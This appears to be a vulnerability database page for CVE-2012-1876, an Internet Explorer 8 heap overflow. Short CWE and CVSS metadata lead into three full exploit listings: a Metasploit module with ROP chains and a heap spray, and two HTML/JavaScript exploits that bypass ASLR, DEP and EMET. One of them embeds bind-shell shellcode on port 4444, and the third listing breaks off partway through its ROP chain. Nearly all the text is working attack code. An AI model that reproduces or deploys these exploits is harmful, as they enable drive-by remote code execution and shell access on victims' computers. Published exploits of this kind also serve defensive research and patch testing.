Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-94 |
Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
9.3 |
|
AV:N/AC:M/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 20174
Publication date : 2012-08-01 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:os_name => OperatingSystems::WINDOWS,
:ua_minver => "8.0",
:ua_maxver => "8.0",
:rank => NormalRanking, # reliable memory corruption
:javascript => true
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Internet Explorer Fixed Table Col Span Heap Overflow',
'Description' => %q{
This module exploits a heap overflow vulnerability in Internet Explorer caused
by an incorrect handling of the span attribute for col elements from a fixed table,
when they are modified dynamically by javascript code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Alexandre Pelletier', # Vulnerability analysis
'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module
'binjo', # Metasploit module
'sinn3r', # Help with the Metasploit module
'juan' # Help with the Metasploit module
],
'References' =>
[
[ 'CVE', '2012-1876' ],
[ 'OSVDB', '82866'],
[ 'BID', '53848' ],
[ 'MSB', 'MS12-037' ],
[ 'URL', 'http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 8 on Windows XP SP3 with msvcrt ROP',
{
'Rop' => :msvcrt
}
],
[ 'IE 8 on Windows 7 SP1',
{
'Rop' => :jre
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jun 12 2012',
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class)
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
return targets[1] #IE 8 on Windows XP SP3
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
return targets[2] #IE 8 on Windows 7 with JRE
else
return nil
end
end
def junk(n=4)
return rand_text_alpha(n).unpack("V").first
end
def nop
return make_nops(4).unpack("V").first
end
def get_payload(t)
code = payload.encoded
# Both ROP chains generated by mona.py - See corelan.be
case t['Rop']
when :msvcrt
print_status("Using msvcrt ROP")
exec_size = code.length
rop =
[
0x77c4ec01, # retn
0x77c4ec00, # pop ebp; retn
0x77c15ed5, # xchg eax,esp; retn (pivot)
0x77c4e392, # pop eax; retn
0x77c11120, # <- *&VirtualProtect()
0x77c2e493, # mov eax, dword ptr ds:[eax]; pop ebp; retn
junk,
0x77c2dd6c,
0x77c4ec00, # pop ebp; retn
0x77c35459, # ptr to 'push esp; ret'
0x77c47705, # pop ebx; retn
exec_size, # ebx
0x77c3ea01, # pop ecx; retn
0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
0x77c46100, # pop edi; retn
0x77c46101, # rop nop (-> edi)
0x77c4d680, # pop edx; retn
0x00000040, # newProtect (0x40) (-> edx)
0x77c4e392, # pop eax; retn
nop, # nops (-> eax)
0x77c12df9 # pushad; retn
].pack("V*")
when :jre
print_status("Using JRE ROP")
exec_size = code.length
rop =
[
0x7c346c0b, # retn
0x7c36f970, # pop ebp; retn
0x7c348b05, # xchg eax,esp; retn (pivot)
0x7c36f970, # pop ebp; retn [MSVCR71.dll]
0x7c36f970, # skip 4 bytes [MSVCR71.dll]
0x7c34373a, # pop ebx ; retn [MSVCR71.dll]
exec_size, # ebx
0x7c3444d0, # pop edx ; retn [MSVCR71.dll]
0x00000040, # 0x00000040-> edx
0x7c361829, # pop ecx ; retn [MSVCR71.dll]
0x7c38f036, # &Writable location [MSVCR71.dll]
0x7c342766, # pop edi ; retn [MSVCR71.dll]
0x7c346c0b, # retn (rop nop) [MSVCR71.dll]
0x7c350564, # pop esi ; retn [MSVCR71.dll]
0x7c3415a2, # jmp [eax] [MSVCR71.dll]
0x7c3766ff, # pop eax ; retn [MSVCR71.dll]
0x7c37a151, # ptr to &VirtualProtect() - 0x0ef [IAT msvcr71.dll]
0x7c378c81, # pushad # add al,0ef ; retn [MSVCR71.dll]
0x7c345c30 # ptr to 'push esp; ret ' [MSVCR71.dll]
].pack("V*")
end
code = rop + code
return code
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
my_target = get_target(agent)
# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("Browser not supported: #{agent}")
send_not_found(cli)
return
end
js_code = Rex::Text.to_unescape(get_payload(my_target), Rex::Arch.endian(target.arch))
table_builder = ''
0.upto(132) do |i|
table_builder << "<table style=\"table-layout:fixed\" ><col id=\"#{i}\" width=\"41\" span=\"9\" >  </col></table>"
end
# About smash_vtable():
# * smash the vftable 0x07070024
# * span => the amount to overwrite
js_element_id = Rex::Text.rand_text_alpha(4)
spray_trigger_js = <<-JS
var dap = "EEEE";
while ( dap.length < 480 ) dap += dap;
var padding = "AAAA";
while ( padding.length < 480 ) padding += padding;
var filler = "BBBB";
while ( filler.length < 480 ) filler += filler;
var arr = new Array();
var rra = new Array();
var div_container = document.getElementById("#{js_element_id}");
div_container.style.cssText = "display:none";
for (var i=0; i < 500; i+=2) {
rra[i] = dap.substring(0, (0x100-6)/2);
arr[i] = padding.substring(0, (0x100-6)/2);
arr[i+1] = filler.substring(0, (0x100-6)/2);
var obj = document.createElement("button");
div_container.appendChild(obj);
}
for (var i=200; i<500; i+=2 ) {
rra[i] = null;
CollectGarbage();
}
function heap_spray(){
CollectGarbage();
var shellcode = unescape("#{js_code}");
while (shellcode.length < 100000)
shellcode = shellcode + shellcode;
var onemeg = shellcode.substr(0, 64*1024/2);
for (i=0; i<14; i++) {
onemeg += shellcode.substr(0, 64*1024/2);
}
onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
var spray = new Array();
for (i=0; i<400; i++) {
spray[i] = onemeg.substr(0, onemeg.length);
}
}
function smash_vtable(){
var obj_col_0 = document.getElementById("132");
obj_col_0.width = "1178993";
obj_col_0.span = "44";
}
setTimeout(function(){heap_spray()}, 400);
setTimeout(function(){smash_vtable()}, 700);
JS
if datastore['OBFUSCATE']
spray_trigger_js = ::Rex::Exploitation::JSObfu.new(spray_trigger_js)
spray_trigger_js.obfuscate
end
# build html
content = <<-HTML
<html>
<body>
<div id="#{js_element_id}"></div>
#{table_builder}
<script language='javascript'>
#{spray_trigger_js}
</script>
</body>
</html>
HTML
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
end
end
Exploit Database EDB-ID : 33944
Publication date : 2014-06-30 22h00 +00:00
Author : sickness
EDB Verified : Yes
<!--
** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 4.1.X bypass
** Offensive Security Research Team
** http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet
** Affected Software: Internet Explorer 8
** Vulnerability: Fixed Col Span ID
** CVE: CVE-2012-1876
** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 4.1.X
-->
<html>
<body>
<div id="evil"></div>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>
<script language='javascript'>
function strtoint(str) {
return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}
var free = "EEEE";
while ( free.length < 500 ) free += free;
var string1 = "AAAA";
while ( string1.length < 500 ) string1 += string1;
var string2 = "BBBB";
while ( string2.length < 500 ) string2 += string2;
var fr = new Array();
var al = new Array();
var bl = new Array();
var div_container = document.getElementById("evil");
div_container.style.cssText = "display:none";
for (var i=0; i < 500; i+=2) {
fr[i] = free.substring(0, (0x100-6)/2);
al[i] = string1.substring(0, (0x100-6)/2);
bl[i] = string2.substring(0, (0x100-6)/2);
var obj = document.createElement("button");
div_container.appendChild(obj);
}
for (var i=200; i<500; i+=2 ) {
fr[i] = null;
CollectGarbage();
}
function heapspray(cbuttonlayout) {
CollectGarbage();
var rop = cbuttonlayout + 4161; // RET
var rop = rop.toString(16);
var rop1 = rop.substring(4,8);
var rop2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 11360; // POP EBP
var rop = rop.toString(16);
var rop3 = rop.substring(4,8);
var rop4 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 111675; // XCHG EAX,ESP
var rop = rop.toString(16);
var rop5 = rop.substring(4,8);
var rop6 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12377; // POP EBX
var rop = rop.toString(16);
var rop7 = rop.substring(4,8);
var rop8 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 642768; // POP EDX
var rop = rop.toString(16);
var rop9 = rop.substring(4,8);
var rop10 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12201; // POP ECX --> Changed
var rop = rop.toString(16);
var rop11 = rop.substring(4,8);
var rop12 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 5504544; // Writable location
var rop = rop.toString(16);
var writable1 = rop.substring(4,8);
var writable2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12462; // POP EDI
var rop = rop.toString(16);
var rop13 = rop.substring(4,8);
var rop14 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12043; // POP ESI --> changed
var rop = rop.toString(16);
var rop15 = rop.substring(4,8);
var rop16 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 63776; // JMP EAX
var rop = rop.toString(16);
var jmpeax1 = rop.substring(4,8);
var jmpeax2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 85751; // POP EAX
var rop = rop.toString(16);
var rop17 = rop.substring(4,8);
var rop18 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 4936; // VirtualProtect()
var rop = rop.toString(16);
var vp1 = rop.substring(4,8);
var vp2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
var rop = rop.toString(16);
var rop19 = rop.substring(4,8);
var rop20 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 234657; // PUSHAD
var rop = rop.toString(16);
var rop21 = rop.substring(4,8);
var rop22 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 408958; // PUSH ESP
var rop = rop.toString(16);
var rop23 = rop.substring(4,8);
var rop24 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2228408; // POP ECX
var rop = rop.toString(16);
var rop25 = rop.substring(4,8);
var rop26 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1586172; // POP EAX
var rop = rop.toString(16);
var rop27 = rop.substring(4,8);
var rop28 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]
var rop = rop.toString(16);
var rop29 = rop.substring(4,8);
var rop30 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1884912; // PUSH EAX
var rop = rop.toString(16);
var rop31 = rop.substring(4,8);
var rop32 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2140694; // ADD EAX,ECX
var rop = rop.toString(16);
var rop33 = rop.substring(4,8);
var rop34 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX
var rop = rop.toString(16);
var rop35 = rop.substring(4,8);
var rop36 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 5036248; // ADD ESP,0C
var rop = rop.toString(16);
var rop37 = rop.substring(4,8);
var rop38 = rop.substring(0,4); // } RET
var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW
var getmodulew = getmodulew.toString(16);
var getmodulew1 = getmodulew.substring(4,8);
var getmodulew2 = getmodulew.substring(0,4); // } RET
var getprocaddr = cbuttonlayout + 4836; // GetProcAddress
var getprocaddr = getprocaddr.toString(16);
var getprocaddr1 = getprocaddr.substring(4,8);
var getprocaddr2 = getprocaddr.substring(0,4); // } RET
var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
shellcode+= unescape("%u4141%u4141"); // PADDING
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN
// EMET disable part 0x01
// Implement the Tachyon detection grid to overcome the Romulan cloaking device.
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN
shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u101C%u076d"); // EMET string
shellcode+= unescape("%ue220%u0007"); // EMET offset
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u0000%u0000"); // Zero out ECX
shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN
shellcode+= unescape("%u"+rop37+"%u"+rop38); // ADD ESP,0C # RETN
shellcode+= "EMET"; // EMET string
shellcode+= unescape("%u0000%u0000"); // EMET string
// EMET disable part 0x01 end
// Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP
shellcode+= unescape("%u1024%u0000"); // Size 0x00001024
shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX
shellcode+= unescape("%u0040%u0000"); // 0x00000040
shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX
shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location
shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX
shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX
shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD
shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP
shellcode+= unescape("%u9090%u9090"); // NOPs
// EMET disable part 0x02
// Execute the Corbomite bluff to disarm EAF
shellcode+= unescape("%uc0b8%u6d10");
shellcode+= unescape("%u8b07%u8b00");
shellcode+= unescape("%u6800%u10c8");
shellcode+= unescape("%u076d%ud0ff");
shellcode+= unescape("%ud468%u6d10");
shellcode+= unescape("%u5007%uc4b8");
shellcode+= unescape("%u6d10%u8b07");
shellcode+= unescape("%u8b00%uff00");
shellcode+= unescape("%u8bd0%u81f0");
shellcode+= unescape("%uccec%u0002");
shellcode+= unescape("%uc700%u2404");
shellcode+= unescape("%u0010%u0001");
shellcode+= unescape("%ufc8b%uccb9");
shellcode+= unescape("%u0002%u8300");
shellcode+= unescape("%u04c7%ue983");
shellcode+= unescape("%u3304%uf3c0");
shellcode+= unescape("%u54aa%ufe6a");
shellcode+= unescape("%ud6ff%u9090");
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u29eb"); // NOPs
shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW
shellcode+= unescape("%u"+getprocaddr1+"%u"+getprocaddr2); // GetProcAddress
shellcode+= "NTDLL";
shellcode+= unescape("%u0000");
shellcode+= unescape("%u744e%u6553"); // NtSetContextThread
shellcode+= unescape("%u4374%u6e6f");
shellcode+= unescape("%u6574%u7478");
shellcode+= unescape("%u6854%u6572");
shellcode+= unescape("%u6461%u0000");
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u9090"); // NOPs
// EMET disable part 0x02 end
// Bind shellcode on 4444 :)
// msf > generate -t js_le
// windows/shell_bind_tcp - 342 bytes
// http://www.metasploit.com
// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
// I would keep the shellcode the same size for better reliability :)
shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
"%u006a%uff53%u41d5");
// Total spray should be 1000
var padding = unescape("%u9090");
while (padding.length < 1000)
padding = padding + padding;
var padding = padding.substr(0, 1000 - shellcode.length);
shellcode+= padding;
while (shellcode.length < 100000)
shellcode = shellcode + shellcode;
var onemeg = shellcode.substr(0, 64*1024/2);
for (i=0; i<14; i++) {
onemeg += shellcode.substr(0, 64*1024/2);
}
onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
var spray = new Array();
for (i=0; i<100; i++) {
spray[i] = onemeg.substr(0, onemeg.length);
}
}
function leak(){
var leak_col = document.getElementById("132");
leak_col.width = "41";
leak_col.span = "19";
}
function get_leak() {
var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
str_addr = str_addr - 1410704;
var hex = str_addr.toString(16);
//alert(hex);
setTimeout(function(){heapspray(str_addr)}, 50);
}
function trigger_overflow(){
var evil_col = document.getElementById("132");
evil_col.width = "1245880";
evil_col.span = "44";
}
setTimeout(function(){leak()}, 400);
setTimeout(function(){get_leak()},450);
setTimeout(function(){trigger_overflow()}, 700);
</script>
</body>
</html>
Exploit Database EDB-ID : 34815
Publication date : 2014-09-28 22h00 +00:00
Author : ryujin & sickness
EDB Verified : Yes
<!--
** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.0 bypass
** Exploit Coded by sickness || EMET 5.0 bypass by ryujin
** http://www.offensive-security.com/vulndev/disarming-emet-v5-0/
** Affected Software: Internet Explorer 8
** Vulnerability: Fixed Col Span ID
** CVE: CVE-2012-1876
** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.0
-->
<html>
<body>
<div id="evil"></div>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>
<script language='javascript'>
function strtoint(str) {
return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}
var free = "EEEE";
while ( free.length < 500 ) free += free;
var string1 = "AAAA";
while ( string1.length < 500 ) string1 += string1;
var string2 = "BBBB";
while ( string2.length < 500 ) string2 += string2;
var fr = new Array();
var al = new Array();
var bl = new Array();
var div_container = document.getElementById("evil");
div_container.style.cssText = "display:none";
for (var i=0; i < 500; i+=2) {
fr[i] = free.substring(0, (0x100-6)/2);
al[i] = string1.substring(0, (0x100-6)/2);
bl[i] = string2.substring(0, (0x100-6)/2);
var obj = document.createElement("button");
div_container.appendChild(obj);
}
for (var i=200; i<500; i+=2 ) {
fr[i] = null;
CollectGarbage();
}
function heapspray(cbuttonlayout) {
CollectGarbage();
var rop = cbuttonlayout + 4161; // RET
var rop = rop.toString(16);
var rop1 = rop.substring(4,8);
var rop2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 11360; // POP EBP
var rop = rop.toString(16);
var rop3 = rop.substring(4,8);
var rop4 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 111675; // XCHG EAX,ESP
var rop = rop.toString(16);
var rop5 = rop.substring(4,8);
var rop6 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12377; // POP EBX
var rop = rop.toString(16);
var rop7 = rop.substring(4,8);
var rop8 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 642768; // POP EDX
var rop = rop.toString(16);
var rop9 = rop.substring(4,8);
var rop10 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12201; // POP ECX --> Changed
var rop = rop.toString(16);
var rop11 = rop.substring(4,8);
var rop12 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 5504544; // Writable location
var rop = rop.toString(16);
var writable1 = rop.substring(4,8);
var writable2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12462; // POP EDI
var rop = rop.toString(16);
var rop13 = rop.substring(4,8);
var rop14 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12043; // POP ESI --> changed
var rop = rop.toString(16);
var rop15 = rop.substring(4,8);
var rop16 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 63776; // JMP EAX
var rop = rop.toString(16);
var jmpeax1 = rop.substring(4,8);
var jmpeax2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 85751; // POP EAX
var rop = rop.toString(16);
var rop17 = rop.substring(4,8);
var rop18 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 4936; // VirtualProtect()
var rop = rop.toString(16);
var vp1 = rop.substring(4,8);
var vp2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
var rop = rop.toString(16);
var rop19 = rop.substring(4,8);
var rop20 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 234657; // PUSHAD
var rop = rop.toString(16);
var rop21 = rop.substring(4,8);
var rop22 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 408958; // PUSH ESP
var rop = rop.toString(16);
var rop23 = rop.substring(4,8);
var rop24 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2228408; // POP ECX
var rop = rop.toString(16);
var rop25 = rop.substring(4,8);
var rop26 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1586172; // POP EAX
var rop = rop.toString(16);
var rop27 = rop.substring(4,8);
var rop28 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]
var rop = rop.toString(16);
var rop29 = rop.substring(4,8);
var rop30 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1884912; // PUSH EAX
var rop = rop.toString(16);
var rop31 = rop.substring(4,8);
var rop32 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2140694; // ADD EAX,ECX
var rop = rop.toString(16);
var rop33 = rop.substring(4,8);
var rop34 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX
var rop = rop.toString(16);
var rop35 = rop.substring(4,8);
var rop36 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 5036248; // ADD ESP,0C
var rop = rop.toString(16);
var rop37 = rop.substring(4,8);
var rop38 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX
var rop = rop.toString(16);
var rop39 = rop.substring(4,8);
var rop40 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 3660458; // MOV EDX,EAX # MOV EAX,EDX # POP ESI
var rop = rop.toString(16);
var rop41 = rop.substring(4,8);
var rop42 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1560432; // PUSH EDX # CALL EAX
var rop = rop.toString(16);
var rop43 = rop.substring(4,8);
var rop44 = rop.substring(0,4); // } RET
var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW
var getmodulew = getmodulew.toString(16);
var getmodulew1 = getmodulew.substring(4,8);
var getmodulew2 = getmodulew.substring(0,4); // } RET
var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
shellcode+= unescape("%u4141%u4141"); // PADDING
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN
// EMET disable part 0x01
// Implement the Tachyon detection grid to overcome the Romulan cloaking device.
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN
shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW Ptr
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u10c4%u076d"); // EMET_STRING_PTR (GetModuleHandle argument)
shellcode+= unescape("%ua84c%u000a"); // EMET_CONFIG_STRUCT offset
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
shellcode+= unescape("%u10c0%u076d"); // MEM_ADDRESS_PTR (Store EMET base address here for later)
shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (Get the address of EMET_CONFIG_STRUCT)
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
shellcode+= unescape("%u104c%u076d"); // Get fake DecodePointer argument from the stack and update it with the encoded value
shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN
shellcode+= unescape("%u10c0%u076d"); // Get EMET base address Ptr
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u80b0%u0004"); // Get DecodePointer offset from the stack
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (DecodePointer in IAT)
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
shellcode+= unescape("%u9090%u9090"); // Fake DecodePointer argument (Will be patched)
shellcode+= unescape("%u10bc%u076d"); // MEM_ADDRESS_PTR (Store decoded pointer here here for later)
shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u0558%u0000"); // ROP Protections offset
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u0000%u0000"); // NULL
shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN
// EMET disable part 0x01 end
// Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP
